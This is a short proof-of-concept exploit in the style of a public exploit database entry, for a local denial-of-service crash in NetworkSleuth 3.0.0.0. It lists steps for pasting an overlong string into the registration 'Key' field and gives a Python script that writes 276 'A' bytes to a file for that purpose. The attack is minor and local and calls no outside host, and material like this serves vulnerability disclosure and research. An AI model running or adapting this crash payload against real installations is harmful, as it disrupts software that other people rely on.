# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2018-12-27 # Vendor Homepage: www.nsauditor.com # Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested Version: 3.0.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code : python NetworkSleuth_3.0.0.0.py # 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard # 3.- Open NetworkSleuth # 4.- Register -> Enter Registration Code... # 5.- Name: -> l4m5 # 6.- Paste ClipBoard on "Key:" # 7.- OK # 8.- Crashed #!/usr/bin/env python buffer = "\x41" * 276 f = open ("NetworkSleuth_3.0.0.0.txt", "w") f.write(buffer) f.close()